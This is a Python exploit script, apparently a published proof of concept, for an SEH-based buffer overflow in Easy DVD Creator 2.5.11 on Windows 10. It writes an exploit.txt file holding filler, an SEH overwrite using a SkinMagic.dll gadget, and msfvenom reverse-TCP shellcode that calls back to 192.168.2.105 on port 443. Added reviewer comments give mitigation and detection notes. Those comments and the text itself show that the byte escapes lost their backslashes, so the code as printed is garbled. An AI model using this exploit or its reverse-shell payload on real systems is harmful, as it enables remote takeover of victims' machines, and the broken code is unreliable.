#!/usr/bin/python

###############################################################################
# Exploit Title: Easy DVD Creator 2.5.11 - Buffer Overflow (Windows 10 64bit, SEH)

###############################################################################
# Exploit Title: Easy DVD Creator 2.5.11 - Buffer Overflow (Windows 10 64bit, SEH)
# Date: 26-08-2017
# Exploit Author: tr0ubl3m4k3r
# Vulnerable Software: Easy DVD Creator
# Vendor Homepage: http://www.divxtodvd.net/
# Version: 2.5.11
# Software Link: http://www.divxtodvd.net/easy_dvd_creator.exe
# Tested On: Windows 10 64bit
#
# Credit to Muhann4d for discovering the PoC (41911).
#
# To reproduce the exploit:
# 1. Click Register
# 2. In the "Enter User Name" field, paste the content of exploit.txt
#
##############################################################################


# NOTE(review): every "xNN" token in this listing is a three-character ASCII
# string, not a byte escape — the escape backslashes appear to have been lost
# when the file was copied, so the script as published emits readable text
# ("x41x41...") rather than the byte counts the comments describe. The length
# arithmetic below (988, 16, 351, 1000) refers to the intended byte layout.
buffer = "x41" * 988                  # filler reaching the SEH record (intended 988 bytes)
nSEH = "xebx09x90x90"                 # 4-byte "next SEH" slot that precedes the handler address

# 0x10037859 : pop ebx # pop eax # ret | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll]
# ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.8.1.1 (C:Program Files (x86)Easy MOV ConverterSkinMagic.dll)
# Defender note: the handler overwrite depends on a bundled module built
# without SafeSEH or ASLR (per the mapping above). Relevant mitigations are
# SEHOP on the host and rebuilding/shipping the DLL with /SAFESEH and
# /DYNAMICBASE; a fixed vendor build would remove this gadget.

SEH = "x59x78x03x10"                  # handler address 0x10037859, little-endian
junk = "x90"*16                       # 16-byte NOP-style pad before the payload

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.105 LPORT=443
# -f c -e x86/shikata_ga_nai -b "x00x0ax0d"
# Detection note: the payload is a reverse TCP shell to the LHOST/LPORT above,
# so on a victim host the indicator is the Easy DVD Creator process opening an
# outbound connection on port 443 to a non-web destination. The encoder and
# bad-character set are as given in the command; the payload itself is the
# 351 "xNN" tokens on the lines below (23 lines of 15 plus a final 6).

shellcode = ("xdbxd5xbfxd7xf8x35x95xd9x74x24xf4x5ax2bxc9xb1"
"x52x83xc2x04x31x7ax13x03xadxebxd7x60xadxe4x9a"
"x8bx4dxf5xfax02xa8xc4x3ax70xb9x77x8bxf2xefx7b"
"x60x56x1bx0fx04x7fx2cxb8xa3x59x03x39x9fx9ax02"
"xb9xe2xcexe4x80x2cx03xe5xc5x51xeexb7x9ex1ex5d"
"x27xaax6bx5exccxe0x7axe6x31xb0x7dxc7xe4xcax27"
"xc7x07x1ex5cx4ex1fx43x59x18x94xb7x15x9bx7cx86"
"xd6x30x41x26x25x48x86x81xd6x3fxfexf1x6bx38xc5"
"x88xb7xcdxddx2bx33x75x39xcdx90xe0xcaxc1x5dx66"
"x94xc5x60xabxafxf2xe9x4ax7fx73xa9x68x5bxdfx69"
"x10xfax85xdcx2dx1cx66x80x8bx57x8bxd5xa1x3axc4"
"x1ax88xc4x14x35x9bxb7x26x9ax37x5fx0bx53x9ex98"
"x6cx4ex66x36x93x71x97x1fx50x25xc7x37x71x46x8c"
"xc7x7ex93x03x97xd0x4cxe4x47x91x3cx8cx8dx1ex62"
"xacxaexf4x0bx47x55x9fxf3x30x57x36x9cx42x57xc9"
"xe7xcaxb1xa3x07x9bx6ax5cxb1x86xe0xfdx3ex1dx8d"
"x3exb4x92x72xf0x3dxdex60x65xcex95xdax20xd1x03"
"x72xaex40xc8x82xb9x78x47xd5xeex4fx9exb3x02xe9"
"x08xa1xdex6fx72x61x05x4cx7dx68xc8xe8x59x7ax14"
"xf0xe5x2exc8xa7xb3x98xaex11x72x72x79xcdxdcx12"
"xfcx3dxdfx64x01x68xa9x88xb0xc5xecxb7x7dx82xf8"
"xc0x63x32x06x1bx20x42x4dx01x01xcbx08xd0x13x96"
"xaax0fx57xafx28xa5x28x54x30xccx2dx10xf6x3dx5c"
"x09x93x41xf3x2axb6")
padding = "x44"*(1000-351)            # pad the payload region out to 1000 intended bytes
# Writes "exploit.txt" into the current working directory; this script does no
# network or process activity itself — per the header, the file's content is
# pasted by hand into the application's "Enter User Name" field. The file is
# the only host artifact the script leaves behind. (open()/close() rather than
# a with-block is the original author's choice; left unchanged here.)
f = open ("exploit.txt", "w")
f.write(buffer + nSEH + SEH + junk + shellcode + padding)
f.close()